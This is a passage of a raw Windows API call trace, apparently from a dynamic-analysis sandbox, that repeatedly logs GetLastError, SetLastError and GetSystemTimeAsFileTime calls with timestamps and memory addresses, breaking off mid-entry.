[0084.950] GetLastError () returned 0x0 [0084.950] SetLastError (dwErrCode=0x0) [0084.950] GetLastError () returned 0x0 [0084.950] SetLastError (dwErrCode=0x0) [0084.950] GetLastError () returned 0x0 [0084.950] SetLastError (dwErrCode=0x0) [0084.950] GetLastError () returned 0x0 [0084.950] SetLastError (dwErrCode=0x0) [0084.950] GetLastError () returned 0x0 [0084.950] SetLastError (dwErrCode=0x0) [0084.950] GetLastError () returned 0x0 [0084.950] SetLastError (dwErrCode=0x0) [0084.950] GetLastError () returned 0x0 [0084.950] SetLastError (dwErrCode=0x0) [0084.950] GetLastError () returned 0x0 [0084.950] SetLastError (dwErrCode=0x0) [0084.950] GetLastError () returned 0x0 [0084.950] SetLastError (dwErrCode=0x0) [0084.950] GetLastError () returned 0x0 [0084.950] SetLastError (dwErrCode=0x0) [0084.951] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd92237d0, dwHighDateTime=0x1d4be3a)) [0084.951] GetLastError () returned 0x0 [0084.951] SetLastError (dwErrCode=0x0) [0084.951] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd92237d0, dwHighDateTime=0x1d4be3a)) [0084.951] GetLastError () returned 0x0 [0084.951] SetLastError (dwErrCode=0x0) [0084.951] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd92237d0, dwHighDateTime=0x1d4be3a)) [0084.951] GetLastError () returned 0x0 [0084.951] SetLastError (dwErrCode=0x0) [0084.951] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd92237d0, dwHighDateTime=0x1d4be3a)) [0084.951] GetLastError () returned 0x0 [0084.951] SetLastError (dwErrCode=0x0) [0084.951] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd92237d0, dwHighDateTime=0x1d4be3a)) [0084.951] GetLastError () returned 0x0 [0084.951] SetLastError (dwErrCode=0x0) [0084.951] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd92237d0, dwHighDateTime=0x1d4be3a)) [0084.951] GetLastError () returned 0x0 [0084.951] SetLastError (dwErrCode=0x0) [0084.951] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd92237d0, dwHighDateTime=0x1d4be3a)) [0084.951] GetLastError () returned 0x0 [0084.951] SetLastError (dwErrCode=0x0) [0084.951] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd92237d0, dwHighDateTime=0x1d4be3a)) [0084.951] GetLastError () returned 0x0 [0084.951] SetLastError (dwErrCode=0x0) [0084.951] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd92237d0, dwHighDateTime=0x1d4be3a)) [0084.951] GetLastError () returned 0x0 [0084.951] SetLastError (dwErrCode=0x0) [0084.951] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd92237d0, dwHighDateTime=0x1d4be3a)) [0084.951] GetLastError () returned 0x0 [0084.951] SetLastError (dwErrCode=0x0) [0084.951] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd92237d0, dwHighDateTime=0x1d4be3a)) [0084.952] GetLastError () returned 0x0 [0084.952] SetLastError (dwErrCode=0x0) [0084.952] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.952] GetLastError () returned 0x0 [0084.952] SetLastError (dwErrCode=0x0) [0084.952] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.952] GetLastError () returned 0x0 [0084.952] SetLastError (dwErrCode=0x0) [0084.952] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.952] GetLastError () returned 0x0 [0084.952] SetLastError (dwErrCode=0x0) [0084.952] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.952] GetLastError () returned 0x0 [0084.952] SetLastError (dwErrCode=0x0) [0084.952] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.952] GetLastError () returned 0x0 [0084.952] SetLastError (dwErrCode=0x0) [0084.952] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.953] GetLastError () returned 0x0 [0084.953] SetLastError (dwErrCode=0x0) [0084.953] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.953] GetLastError () returned 0x0 [0084.953] SetLastError (dwErrCode=0x0) [0084.953] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.953] GetLastError () returned 0x0 [0084.953] SetLastError (dwErrCode=0x0) [0084.953] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.953] GetLastError () returned 0x0 [0084.953] SetLastError (dwErrCode=0x0) [0084.953] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.953] GetLastError () returned 0x0 [0084.953] SetLastError (dwErrCode=0x0) [0084.953] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.953] GetLastError () returned 0x0 [0084.953] SetLastError (dwErrCode=0x0) [0084.953] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.953] GetLastError () returned 0x0 [0084.953] SetLastError (dwErrCode=0x0) [0084.953] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.953] GetLastError () returned 0x0 [0084.953] SetLastError (dwErrCode=0x0) [0084.953] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.953] GetLastError () returned 0x0 [0084.953] SetLastError (dwErrCode=0x0) [0084.953] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.953] GetLastError () returned 0x0 [0084.953] SetLastError (dwErrCode=0x0) [0084.953] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.953] GetLastError () returned 0x0 [0084.953] SetLastError (dwErrCode=0x0) [0084.953] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.953] GetLastError () returned 0x0 [0084.953] SetLastError (dwErrCode=0x0) [0084.953] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.953] GetLastError () returned 0x0 [0084.953] SetLastError (dwErrCode=0x0) [0084.953] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.953] GetLastError () returned 0x0 [0084.954] SetLastError (dwErrCode=0x0) [0084.954] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.954] GetLastError () returned 0x0 [0084.954] SetLastError (dwErrCode=0x0) [0084.954] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.954] GetLastError () returned 0x0 [0084.954] SetLastError (dwErrCode=0x0) [0084.954] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.954] GetLastError () returned 0x0 [0084.954] SetLastError (dwErrCode=0x0) [0084.954] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.954] GetLastError () returned 0x0 [0084.954] SetLastError (dwErrCode=0x0) [0084.954] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.954] GetLastError () returned 0x0 [0084.954] SetLastError (dwErrCode=0x0) [0084.954] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.954] GetLastError () returned 0x0 [0084.954] SetLastError (dwErrCode=0x0) [0084.954] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.954] GetLastError () returned 0x0 [0084.954] SetLastError (dwErrCode=0x0) [0084.954] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.954] GetLastError () returned 0x0 [0084.954] SetLastError (dwErrCode=0x0) [0084.954] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.954] GetLastError () returned 0x0 [0084.954] SetLastError (dwErrCode=0x0) [0084.954] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.954] GetLastError () returned 0x0 [0084.954] SetLastError (dwErrCode=0x0) [0084.954] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.954] GetLastError () returned 0x0 [0084.954] SetLastError (dwErrCode=0x0) [0084.954] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.954] GetLastError () returned 0x0 [0084.954] SetLastError (dwErrCode=0x0) [0084.954] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.954] GetLastError () returned 0x0 [0084.954] SetLastError (dwErrCode=0x0) [0084.954] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.955] GetLastError () returned 0x0 [0084.955] SetLastError (dwErrCode=0x0) [0084.955] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.955] GetLastError () returned 0x0 [0084.955] SetLastError (dwErrCode=0x0) [0084.955] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.955] GetLastError () returned 0x0 [0084.955] SetLastError (dwErrCode=0x0) [0084.955] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.955] GetLastError () returned 0x0 [0084.955] SetLastError (dwErrCode=0x0) [0084.955] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.955] GetLastError () returned 0x0 [0084.955] SetLastError (dwErrCode=0x0) [0084.955] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.955] GetLastError () returned 0x0 [0084.955] SetLastError (dwErrCode=0x0) [0084.955] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.955] GetLastError () returned 0x0 [0084.955] SetLastError (dwErrCode=0x0) [0084.955] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.955] GetLastError () returned 0x0 [0084.955] SetLastError (dwErrCode=0x0) [0084.955] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.955] GetLastError () returned 0x0 [0084.955] SetLastError (dwErrCode=0x0) [0084.955] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.955] GetLastError () returned 0x0 [0084.955] SetLastError (dwErrCode=0x0) [0084.955] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.955] GetLastError () returned 0x0 [0084.955] SetLastError (dwErrCode=0x0) [0084.955] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.955] GetLastError () returned 0x0 [0084.955] SetLastError (dwErrCode=0x0) [0084.955] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.955] GetLastError () returned 0x0 [0084.955] SetLastError (dwErrCode=0x0) [0084.955] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.955] GetLastError () returned 0x0 [0084.955] SetLastError (dwErrCode=0x0) [0084.956] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.956] GetLastError () returned 0x0 [0084.956] SetLastError (dwErrCode=0x0) [0084.956] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.956] GetLastError () returned 0x0 [0084.956] SetLastError (dwErrCode=0x0) [0084.956] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.956] GetLastError () returned 0x0 [0084.956] SetLastError (dwErrCode=0x0) [0084.956] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.956] GetLastError () returned 0x0 [0084.956] SetLastError (dwErrCode=0x0) [0084.956] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.956] GetLastError () returned 0x0 [0084.956] SetLastError (dwErrCode=0x0) [0084.956] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.956] GetLastError () returned 0x0 [0084.956] SetLastError (dwErrCode=0x0) [0084.956] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.956] GetLastError () returned 0x0 [0084.956] SetLastError (dwErrCode=0x0) [0084.956] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.956] GetLastError () returned 0x0 [0084.956] SetLastError (dwErrCode=0x0) [0084.956] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.956] GetLastError () returned 0x0 [0084.956] SetLastError (dwErrCode=0x0) [0084.956] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.956] GetLastError () returned 0x0 [0084.956] SetLastError (dwErrCode=0x0) [0084.956] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.956] GetLastError () returned 0x0 [0084.956] SetLastError (dwErrCode=0x0) [0084.956] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.956] GetLastError () returned 0x0 [0084.956] SetLastError (dwErrCode=0x0) [0084.956] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.956] GetLastError () returned 0x0 [0084.956] SetLastError (dwErrCode=0x0) [0084.956] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.956] GetLastError () returned 0x0 [0084.957] SetLastError (dwErrCode=0x0) [0084.957] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.957] GetLastError () returned 0x0 [0084.957] SetLastError (dwErrCode=0x0) [0084.957] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.957] GetLastError () returned 0x0 [0084.957] SetLastError (dwErrCode=0x0) [0084.957] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.957] GetLastError () returned 0x0 [0084.957] SetLastError (dwErrCode=0x0) [0084.957] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.957] GetLastError () returned 0x0 [0084.957] SetLastError (dwErrCode=0x0) [0084.957] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.957] GetLastError () returned 0x0 [0084.957] SetLastError (dwErrCode=0x0) [0084.957] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.957] GetLastError () returned 0x0 [0084.957] SetLastError (dwErrCode=0x0) [0084.957] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.957] GetLastError () returned 0x0 [0084.957] SetLastError (dwErrCode=0x0) [0084.957] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.957] GetLastError () returned 0x0 [0084.957] SetLastError (dwErrCode=0x0) [0084.957] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.957] GetLastError () returned 0x0 [0084.957] SetLastError (dwErrCode=0x0) [0084.957] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.957] GetLastError () returned 0x0 [0084.957] SetLastError (dwErrCode=0x0) [0084.957] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.957] GetLastError () returned 0x0 [0084.957] SetLastError (dwErrCode=0x0) [0084.957] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.957] GetLastError () returned 0x0 [0084.957] SetLastError (dwErrCode=0x0) [0084.957] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.957] GetLastError () returned 0x0 [0084.957] SetLastError (dwErrCode=0x0) [0084.957] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.958] GetLastError () returned 0x0 [0084.958] SetLastError (dwErrCode=0x0) [0084.958] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.958] GetLastError () returned 0x0 [0084.958] SetLastError (dwErrCode=0x0) [0084.958] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.958] GetLastError () returned 0x0 [0084.958] SetLastError (dwErrCode=0x0) [0084.958] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.958] GetLastError () returned 0x0 [0084.958] SetLastError (dwErrCode=0x0) [0084.958] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.958] GetLastError () returned 0x0 [0084.958] SetLastError (dwErrCode=0x0) [0084.958] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.958] GetLastError () returned 0x0 [0084.958] SetLastError (dwErrCode=0x0) [0084.958] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.958] GetLastError () returned 0x0 [0084.958] SetLastError (dwErrCode=0x0) [0084.958] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.958] GetLastError () returned 0x0 [0084.958] SetLastError (dwErrCode=0x0) [0084.958] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.958] GetLastError () returned 0x0 [0084.958] SetLastError (dwErrCode=0x0) [0084.958] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.958] GetLastError () returned 0x0 [0084.958] SetLastError (dwErrCode=0x0) [0084.958] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.958] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.958] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.958] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.959] GetSystemTimeAsFileTime (in: 